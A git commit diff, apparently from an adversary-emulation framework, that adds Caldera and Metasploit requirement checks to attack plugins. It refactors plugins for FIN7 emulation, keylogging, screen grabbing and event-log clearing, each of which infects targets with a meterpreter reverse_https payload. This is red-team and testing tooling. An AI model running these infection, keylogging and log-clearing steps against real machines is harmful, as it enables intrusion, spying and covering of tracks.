Simplifying Metasploit. Fixing stuff and adding requirement for plugins

pull/12/head
Thorsten Sick 3 years ago
parent f9e9b59f56
commit 76a1c210eb

@ -3,11 +3,19 @@
import os
from plugins.base.plugin_base import BasePlugin
from app.exceptions import PluginError, ConfigurationError
from app.exceptions import PluginError, ConfigurationError, RequirementError
from app.calderacontrol import CalderaControl
# from app.metasploit import MSFVenom, Metasploit
from typing import Optional
from plugins.base.machinery import MachineryPlugin
from app.metasploit import MetasploitInstant
from enum import Enum
class Requirement(Enum):
""" Requirements for this plugin """
METASPLOIT = 1
CALDERA = 2
class AttackPlugin(BasePlugin):
@ -23,6 +31,8 @@ class AttackPlugin(BasePlugin):
required_files_attacker: list[str] = [] # a list of files to automatically install to the attacker
required_files_target: list[str] = [] # a list of files to automatically copy to the targets
requirements: Optional[list[Requirement]] = [] # Requirements to run this plugin
# TODO: parse results
def __init__(self):
@ -38,6 +48,25 @@ class AttackPlugin(BasePlugin):
self.metasploit_user: str = "user"
self.metasploit = None
def needs_caldera(self) -> bool:
""" Returns True if this plugin has Caldera in the requirements """
if Requirement.CALDERA in self.requirements:
return True
return False
def needs_metasploit(self) -> bool:
""" Returns True if this plugin has Metasploit in the requirements """
if Requirement.METASPLOIT in self.requirements:
return True
return False
def connect_metasploit(self):
""" Inits metasploit """
if self.needs_metasploit():
self.metasploit = MetasploitInstant(self.metasploit_password, attack_logger=self.attack_logger, attacker=self.attacker_machine_plugin, username=self.metasploit_user)
# If metasploit requirements are not set, self.metasploit stay None and using metasploit from a plugin not having the requirements will trigger an exception
def copy_to_attacker_and_defender(self):
""" Copy attacker/defender specific files to the machines. Called by setup, do not call it yourself. template processing happens before """
@ -103,7 +132,9 @@ class AttackPlugin(BasePlugin):
@param caldera: The caldera object to connect through
"""
self.caldera = caldera
if self.needs_caldera():
self.caldera = caldera
def caldera_attack(self, target: MachineryPlugin, ability_id: str, parameters=None, **kwargs):
""" Attack a single target using caldera
@ -113,6 +144,9 @@ class AttackPlugin(BasePlugin):
@param parameters: parameters to pass to the ability
"""
if not self.needs_caldera():
raise RequirementError("Caldera not in requirements")
self.caldera.attack(paw=target.get_paw(),
ability_id=ability_id,
group=target.get_group(),

@ -3,7 +3,7 @@
# Adversary emulation for FIN7
import socket
from plugins.base.attack import AttackPlugin
from plugins.base.attack import AttackPlugin, Requirement
from app.interface_sfx import CommandlineColors
from app.metasploit import MSFVenom, MetasploitInstant
import os
@ -20,6 +20,8 @@ class FIN7Plugin(AttackPlugin):
required_files_attacker = [] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [Requirement.CALDERA, Requirement.METASPLOIT]
######
payload_type_1 = "windows/x64/meterpreter/reverse_https" # payload for initial stage
@ -33,14 +35,15 @@ class FIN7Plugin(AttackPlugin):
@param payload: payload description. waiting for this payload. Like "windows/x64/meterpreter/reverse_https"
"""
if self.metasploit_1:
return self.metasploit_1
if self.metasploit:
return self.metasploit
self.connect_metasploit()
self.metasploit_1 = MetasploitInstant(self.metasploit_password, attack_logger=self.attack_logger, attacker=self.attacker_machine_plugin, username=self.metasploit_user)
ip = socket.gethostbyname(self.attacker_machine_plugin.get_ip())
self.metasploit_1.start_exploit_stub_for_external_payload(payload=self.payload_type_1, lhost=ip)
self.metasploit_1.wait_for_session()
return self.metasploit_1
self.metasploit.start_exploit_stub_for_external_payload(payload=self.payload_type_1, lhost=ip)
self.metasploit.wait_for_session()
return self.metasploit
def step1(self):
self.attack_logger.vprint(f"{CommandlineColors.OKBLUE}Step 1 (target hotelmanager): Initial Breach{CommandlineColors.ENDC}", 1)

@ -38,7 +38,8 @@ class MetasploitClearevPlugin(AttackPlugin):
metasploit.smart_infect(target,
payload=payload_type,
payload_name=payload_name,
outfile=payload_name,
format="exe",
architecture="x64")
metasploit.clearev(target)

@ -38,7 +38,8 @@ class MetasploitGetuidPlugin(AttackPlugin):
metasploit.smart_infect(target,
payload=payload_type,
payload_name=payload_name,
outfile=payload_name,
format="exe",
architecture="x64")
uid = metasploit.getuid(target)

@ -38,7 +38,8 @@ class MetasploitKeyloggingPlugin(AttackPlugin):
metasploit.smart_infect(target,
payload=payload_type,
payload_name=payload_name,
outfile=payload_name,
format="exe",
architecture="x64")
metasploit.migrate(target, name="winlogon.exe")

@ -38,7 +38,8 @@ class MetasploitPsPlugin(AttackPlugin):
metasploit.smart_infect(target,
payload=payload_type,
payload_name=payload_name,
outfile=payload_name,
format="exe",
architecture="x64")
metasploit.ps_process_discovery(target)

@ -38,7 +38,8 @@ class MetasploitScreengrabPlugin(AttackPlugin):
metasploit.smart_infect(target,
payload=payload_type,
payload_name=payload_name,
outfile=payload_name,
format="exe",
architecture="x64")
metasploit.migrate(target, user="NT AUTHORITY\\SYSTEM")

@ -38,8 +38,9 @@ class MetasploitSysinfoPlugin(AttackPlugin):
metasploit.smart_infect(target,
payload=payload_type,
payload_name=payload_name,
architecture="x86")
outfile=payload_name,
format="exe",
architecture="x64")
si = metasploit.sysinfo(target)
print(f"Sysinfo: {si}")

Loading…
Cancel
Save